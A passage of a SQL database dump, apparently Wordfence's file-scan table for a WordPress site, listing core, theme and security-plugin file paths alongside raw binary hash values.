9��i�+vT��[s','',0,'?'),('��\'-�p�-��f�','wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|�s���A�',']��%FL�\nI�L��l���f426G��\'��','',0,'?'),('��j�ֹJ����0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�0W\"F)����8O�','�5���)&��BoK]���ػ��rm`%��h�O','',0,'?'),('�Q%rT>�!�e_zE��','wp-content/themes/twentytwentyone/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��Տ,;�\"��]&�','\'�ߍ���\0�`q���ֶp�~�r�I�{��','',0,'?'),('�\"�<	i�t��&�','wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�̯��R�j�F�','24�ރ�ki<��u&�*��7�U�s��=~��F�','',0,'?'),('9�k�ɽ �JZ��<','wp-content/themes/twentytwenty/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�G�I\"�+����','�����C��eĻ�3�q�9qR�0�a�J�','',0,'?'),('L��bP�-I׭1f�','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj��	D�^��A5\r','',0,'?'),('N�d#R��+��r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?ue�wD�:��E�','��ζ�\Z��)v���vG��,�h�/�ӈ�','',0,'?'),('\\A7.D��Z0�r�','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/4_preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�BKJQX,�㊃Lo��','H>�\0`�2�>{R^��c��QF����WO���?','',0,'?'),('t������!�\Z�%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('{�~��rb�\\B��%�','wp-content/plugins/wordfence/css/dt_table.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gJbj�J��9�k:�','o[P�HyЊ}���iGc�~��<c�D�R:D�','',0,'?'),('�L��\"�G�ʄ/\nN�','wp-admin/images/privacy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҟ�ݘ���ӽ�}�','qO.���x&��*p���@��l����Β/k','',0,'?'),('�{��Y�\\�z錿�}c','wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('���-� ��\"\"F6','wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^<�|%z�A�M�U<�','���ҟ�q�v@, C�1�4�-����zd,�P�','',0,'?'),('��uq�Oc��T����','wp-content/themes/magazine-hoot/hybrid/inc/functions-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Œ�&W�J9V��','UIQBԽ?���C���1�TN`���R�z�|','',0,'?'),('�?�\0��l����.�','wp-includes/class-wp-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('�2p)��t��I��','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���\0�\">y>=����','xVQ/}�琾:(3&���%�U��Jo��C','',0,'?'),('�����o�Rb��','wp-includes/js/dist/url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bͻ�:�[P�XpXα','pʼn�\0oŖ���c�^f��$l�Б�zƝ','',0,'?'),(' Łq\Z��{��>�d-','wp-content/plugins/wp-cerber/assets/flags/mt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z\n�r�CZ2���Y��','X�g�����a�-\0s!�\nZF�>X��\Z','',0,'?'),(' �es(N^���+q�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�MEƱ��(����(','E��a�\r�f U�DLb�V�ҪW#s�s��','',0,'?'),(' \'���_U;0�/<�','wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�:y�x1s)����','�Ϲ���ݶ1SXCTڼ�<�ڊh`���V','',0,'?'),(' *@ADғ�=pu���E','wp-admin/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W2#	�3�','8庹���R0H����m�я�Ȯ�Я&m','',0,'?'),(' 5��rD�g�籃�','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IT�愭��,�;_','��@��q��>G�C�|�U��sC��p���','',0,'?'),(' <@�s����\r��F��/','wp-includes/Requests/Exception/HTTP/305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),(' V��K+�L\Z*!���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:jC�o\0\"��R�','*(��P�0eU�����!7p�Y�v��3','',0,'?'),(' ���=����g�V�|�','wp-content/themes/twentytwenty/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xM�ɞx���x�','���/�Ç�:�&�s�ۃu ���^&H','',0,'?'),(' �G�ʴ��Gtؑ��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oū3�(	ia�Y���(','����%��\Z0b��[u�#�v.�_��	O�=0','',0,'?'),(' �z�z{����L��H','wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),(' �B*�tj(ȗ%d3>[','wp-content/themes/magazine-hoot/template-parts/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�F�~jX���','���ʈ-�/\0@qI;U������0g���K��','',0,'?'),(' �\r$	Q�^C(����','wp-includes/Requests/Exception/HTTP/505.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]A	3�[/Cd���','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),(' ��c̫)I�\np,͑��','wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),(' ��p��E�4q�&?J�','wp-content/plugins/wp-cerber/assets/flags/im.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('!o�\r��A��v7��e','wp-admin/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t&���V�݁6�ָ','mcT)��Ҝ�O>y�n/@i\"+�5dJ��@���','',0,'?'),('!1b݅9��*�\\��','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��#�ttIrzX�K','Vo�梌>�)�x����Z���EB�O��','',0,'?'),('!I�d]5$���[��~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��L�� k\'k1��','��1�\\�Qt�*���J���%���s��&','',0,'?'),('!Plu6�������CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P���e��1','T���*��+���z]ʜ;>�\n�3���]?x�','',0,'?'),('!_��輵p3p�n��L','wp-includes/images/smilies/icon_eek.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('!|(�y�W�*1Oo2Cu','wp-includes/js/wp-api.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő�	2&�H','',0,'?'),('!��xx�+!���[�(','wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��|�eɤs^�Q�','���f��i7� �L�:��r;�8\"�h<s�P�','',0,'?'),('!�w<���A\n�@�O','wp-includes/js/dist/hooks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<q@o�P��u����','+���(�������d��C%�\'��\Z��v��NR','',0,'?'),('!��y��\'U��b��#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zY��衆:��Lk','3`R<��!���0)B��W�gH�Z��','',0,'?'),('!�##sw:\rH*�$q�','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�u$�j�6�uwq�t�','�r\"��(�-w�a$A�2\"�7��\\��Vb�','',0,'?'),('!��⋶��Z]��n-','wp-includes/block-patterns/quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�:�v,^8^����\"�}','����@��]y�%U?�vw�Xl�^�{q�','',0,'?'),('!��\')�qM*�Xc','wp-includes/blocks/embed/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B���S�):\\l�ID�','��$Xn�{4��aV_`�M,sbݱ�\"�*3��','',0,'?'),('!�R���p�nL�w�m7','wp-includes/js/tinymce/plugins/lists/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('!ہ�Iǵ�`��8�t','wp-includes/js/dist/keyboard-shortcuts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\ZH����%3kGUE','\"�����8��	�鎸\'��o83�J���w���','',0,'?'),('!߬�vg1�IV|�E�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[<��ԉ1��-�3��','�wB��;\\q\\�8�N�!��-�X����!��\n','',0,'?'),('!�Tۦ����	l�I�\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�E��jk��Z:q�','�z�+e<OkM�Δ��t���	��q��hW�','',0,'?'),('!쥰��ӂ� \Z��','wp-content/themes/magazine-hoot/template-parts/slider-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g���a�v2�(','%�Sp����B6J��$��zA����P|�k��','',0,'?'),('!�>лӊ^��[��U}�','wp-includes/js/dist/data-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���p���\r��sµ','�ӝk?������?���d�<���vc','',0,'?'),('!�O�4�bCRR�fO�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����͡�RI0��[','�Ӆ�_3�:��þAs�N���0*Y�g�5�','',0,'?'),('!��Y0-z1�dm>�','wp-admin/js/plugin-install.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�a6���:)�\n','A`��	�w���D�ܞ�n-����SU7�\Zm','',0,'?'),('\"Et�y�s����\Z|g','wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E	��-N�o����','�L�I‘�™Y�ow�)�4!:�;?��','',0,'?'),('\"(}G��r�	0��V(','wp-admin/ms-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<�b�s�\'�+�\Z�Q','q�J��R�_+�V�C%�~d���35k��x��','',0,'?'),('\"-�Ѳ\n2�j%�(o','wp-content/themes/twentynineteen/sass/layout/_layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�&�\"��{����#*�','���v���@.|���s>0�O���A3jA���','',0,'?'),('\"0�rN1M���#���','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('\"8A\n=��ᇼfp5','wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('\"8��p�ʬu�4/��','wp-content/themes/magazine-hoot/README.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�&�����Fe҆�',', 5��\"��x�?�gfe�+�\0!�`��l��I]','',0,'?'),('\"IFn����@�a�}�9','wp-admin/includes/class-wp-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6����n+66��n���','\\AY�Q�ۂ�|�?�X�� �n�\Z��P3�L','',0,'?'),('\"N�M�����k�VO','wp-includes/js/dist/data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Vew����MBE��|�\\','|;\n%��A����@P��L���剟�Ib��','',0,'?'),('\"�\r�o�]\r:T0ۓ�%','wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����k/Fc��t�','���J��%���g�����\0L;�7��R�','',0,'?'),('\"���K�6^�4V�}��','wp-includes/blocks/spacer/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9j5�w�s(�ڱ���I','1�	ib��ǎ�ҫ�&�dV5�ojd\"���2�@��','',0,'?'),('\"�\\�;T��4���X�','wp-content/themes/twentytwenty/inc/svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-kE!�v�/���Mg��','D������v���:��8(uG��4\r','',0,'?'),('\"����b9��e�|�_�','wp-includes/feed-atom-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('\"�����u>1�7���','wp-includes/class-pop3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~���k�X�_��','*�,\\d�W̅�\Z��)`9�N�Q�@J5h&G�','',0,'?'),('\"�Z�_Z\0\0���y�','wp-content/plugins/wp-cerber/assets/flags/mu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�1�����($+a�','m� )���5p�PP�:�|X������u��\0j�','',0,'?'),('\"��6\r+K{�\Z!a','wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�$���D��[@o','�X��=e.��>�o�����E�����','',0,'?'),('\"�w��h����','wp-admin/includes/class-automatic-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ͷ��,?�i�|�','D�]��y�� B�j�&�kK e��1:��’*�','',0,'?'),('\"��0�\0�L�\'M��','wp-includes/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('\"�J���2�\rߤ-H�&','wp-includes/js/dist/date.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�̆H;M�6ɻj�','w��y��D���~�`,�SM�\0�4+�MA','',0,'?'),('#�z1h�����;','wp-content/themes/twentynineteen/sass/navigation/_navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tx߰+e�=�SF�','��5,����nR��j�t�ݑ���ʦ/���','',0,'?'),('#\n��/��PZ~h��','wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+I*kC�e;�P����S','��_\'\\q��F0��{�ТF�\r��.�OK','',0,'?'),('#D�ń�����5%��','wp-includes/class-wp-hook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+%Yj�͑�Q	�^��(','�@I*�۷�����}O�&?����8��q�','',0,'?'),('#W�\n��Y�,!Z��*�','wp-content/plugins/wp-cerber/assets/flags/sn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��-#��9���uQ','i}2��3��&�ܓ��w0��r��wJ,�','',0,'?'),('#^ ̉�Θ!�M�z?{{','wp-content/plugins/wp-cerber/assets/flags/gs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~�\Z7c�o#.','o=b�i�e�U�\Z�N�1>��Vy��..��3Z`�','',0,'?'),('#y���t(�$NT��t�','wp-includes/Requests/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@k7�\0��t�\\*��G','�w<PB��ZC�k�SI�Q!��\n}i','',0,'?'),('#煽$8f5m�v�5�','wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��ѓ�+��','쏂^�/�A���<�! �Q��!-��2\\','',0,'?'),('#�QCw��3e���X�9�','wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|��\0����7���','@U���JL�$)\ZO\\|��bS|o�R˜���','',0,'?'),('#�}s���a��a��,!','wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�50�~�����','�;{֗88}���\r�|�ѫ�^���@Fj','',0,'?'),('#�-g�\\L%3�S݋B#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Z�l��o9͒����','��0	��6�ӭ�Iv����hJ��`����','',0,'?'),('#��iU�f�����zhJF','wp-includes/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('#�4\n�e�4^&R��{�','wp-content/plugins/wordfence/js/admin.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D���T�B�`����','�\"���w�^s�.�$o�4ʻo���޹��߹T@4','',0,'?'),('$\\��Q���L?�1&�{','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)��Ņ���n��','�/5�l��d�eR׫�����H���Z��V�','',0,'?'),('$&��A�ÆJ���_!6�','wp-content/plugins/wp-cerber/assets/flags/my.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QG��M� �;k��=�','_PL��0�\0�:��sP㱤��bˆ�G6Ia�','',0,'?'),('$7y���]���N�','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�<\0cA�F�L��N','R]`�[��2��#�X��Éi(�E\n`��rJ�','',0,'?'),('$N�P��9������','wp-content/plugins/wp-cerber/assets/flags/tn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0$Z�,a��8&��1','�E[�\"�-+����Np�m����f��p�+�W�','',0,'?'),('$�w�7���@)s&��V&','wp-content/plugins/all-in-one-wp-security-and-firewall/images/error.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¨S�N]eD6�����@','<�j��3a���a��k�l-X���','',0,'?'),('$����0S\r�r���','wp-includes/images/smilies/icon_redface.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U���E����','>���D�C9M�cJ�\Z+U���L1f+g���','',0,'?'),('$��S�Ck��d�W�','wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J7^��њO���i','5Qg��wB��H.f��<�<Zh&�V�','',0,'?'),('$�V��|�hhy����','wp-content/themes/twentytwenty/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���#C���4Y�','T�Z�e��g�ҫR��!M��x�0�^�l\r�','',0,'?'),('$���C����/�9��','wp-includes/class-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�I�֩�Eu&S^:�9','���t�D�MQ��ҊW8�����&���8','',0,'?'),('$��-#q`�l�$W�ۉ','wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�����Ӛ%=Z�&3','�s�R�#bǟy��,�K=�l�!�Ϩ�t��.','',0,'?'),('$��|��c�� \\~��','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^>�5�pa��W��>','���������DC��XG4WFP�#�N�S\Z','',0,'?'),('$�t��{71}y��=�','wp-content/themes/magazine-hoot/template-parts/topbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�s�U1�\r�BX	','��G7�)u��|�`r%ľP6�o!93��I_�','',0,'?'),('$��^���6bH^�*��','wp-admin/options-privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��q/�ʵ�����4','p�H�	w�h�66]���	�m���E_��','',0,'?'),('$�ϫ/����!��C�','wp-includes/IXR/class-IXR-introspectionserver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Ua�w�<�Iw�p�O7-','��\n���C����PEQ%�D\r�k*�X���o','',0,'?'),('%�]M�3�T�1T��/','wp-includes/blocks/preformatted/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lr\r,�Av`�� ���T','6�.�_��*��NMo�\r��k��n�Z�\r/��+','',0,'?'),('%����7��娳�','wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�FH��\'\'n��ގ�','KD[Rஞ� ��5�:grP7*X\Z','',0,'?'),('%$���M�q�T<��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��UO��\Zߠ�xtH','�G\n\"�_/A�g�h	U?�S�s�H�ב�Y��ٳ','',0,'?'),('%.�.Ct�=����\\`','wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�v�1^l�&)g�4��','-�l����/6�\\����jx�R�\0Ю��~�','',0,'?'),('%?f�E���Ms���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'G߻�V�I���','%[	kdT�9���5|�}-����U�$s_�W{�','',0,'?'),('%D?�m1QZ\"�cAXQq�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���=���1\nV�0�','8}�>��k6`��uid��eH�P�^�','',0,'?'),('%}�M���ha&�6�','wp-content/themes/twentynineteen/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2Z�P�s>��I�r','E�0R�p4RR���b\\`����a1&�g�����','',0,'?'),('%���9��\\ދ�','wp-admin/includes/class-wp-site-health-auto-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���W���Ni\r��ag','��Z�I��%�W��~�h\0x�ir�!��cJ�b','',0,'?'),('%����8^�V<�t�','wp-admin/edit-tag-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߜ8���]��a','Z��<P���^�k$�>aK�a��G��s*','',0,'?'),('%�fW���	�P0�}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('%�Pb.��8�Gd�t�','wp-admin/css/media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(;Hd����(�_�e�R','Sݱ`�� 6�Xi�\0�v�4K��E�qzi','',0,'?'),('%�~2\" ض=�ǿ\Z^�','wp-content/plugins/wp-cerber/assets/magnific/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���vre����\n�`�','�X�;��Ɛ��9�@u�j�m�[��F�\"!�','',0,'?'),('&PDt�?5u�1Ym��','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����q�jy*_iI�','��z�~t�i������D�5\Z�9l9;�I�','',0,'?'),('&*���dĆָ�	�H5','wp-admin/images/align-center.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�\Zݶ�4y�dY1�e�','�놽N3�X!��lj�h`�����hA]�J�','',0,'?'),('&.��C���F�h\\-�2','wp-content/themes/twentytwentyone/inc/menu-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8\0�=5xv���3�','��y��\nI����\\��d��0����M�U','',0,'?'),('&;����+�	&S�','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/6.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�xC}\rp=iX��[�','�Q���v*Y��(X#��֚�D���fm���~<','',0,'?'),('&=\Z�+t�\"�/k\'\n','wp-includes/js/jquery/jquery.form.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܉l�Ȍ��*��D�','zt�O1� =2X����Q���_�y �}Z\r','',0,'?'),('&ee�\n3K���vZ��','wp-admin/ms-delete-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?bڔ��3��\r\n]m��','�jn�B����TN�&�e��>h��m���uIz<','',0,'?'),('&k\0v_fcb��v�����','wp-includes/js/dist/format-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���h���d6��.{�','�H��? �pq+���t?��l��U��n\'�o�Q�','',0,'?'),('&t!0^g��bJ�c,>3','wp-admin/upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E_-�\r3�','X΢˔&��(�N�\\F�0%��o�0��>�','',0,'?'),('&~�*m�E+nX�%;[O�','wp-includes/css/dist/block-library/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ne��:ʎ)����hVH','�v7��7��a�L�zи�?9!D��4�','',0,'?'),('&D���Q�R��w�]','wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('&���ɚ%��)�W&�i','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>XVD��m�|P6\n','�l=�b:џ��	R�Z��	�����	��6','',0,'?'),('&���Rw?~�j�hJ�D','wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�n5�P�����B\'�','X�U.k⻺�@-(��5�N�����V','',0,'?'),('&��]0W��\n)�=��','wp-includes/js/tinymce/plugins/directionality/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('&�`�O�Q5�Q�43�','wp-admin/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\"��}<м�鵴','$��Sl����\Z���P5��z7���H�','',0,'?'),('&���	P�shcusS','wp-content/wflogs/attack-data.php',0,'#ح\n���y�Ib�\r�\r','#ح\n���y�Ib�\r�\r','l��4Eq�{���������\'wg�31�c�w:�','',0,'?'),('&�vA��Q��c��qw8,','wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8��F����','�����})d!q	,@,��j��v	����E���','',0,'?'),('&饱����W��؀�|�','wp-includes/widgets/class-wp-widget-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�/k�h\n��ֽ[Nv	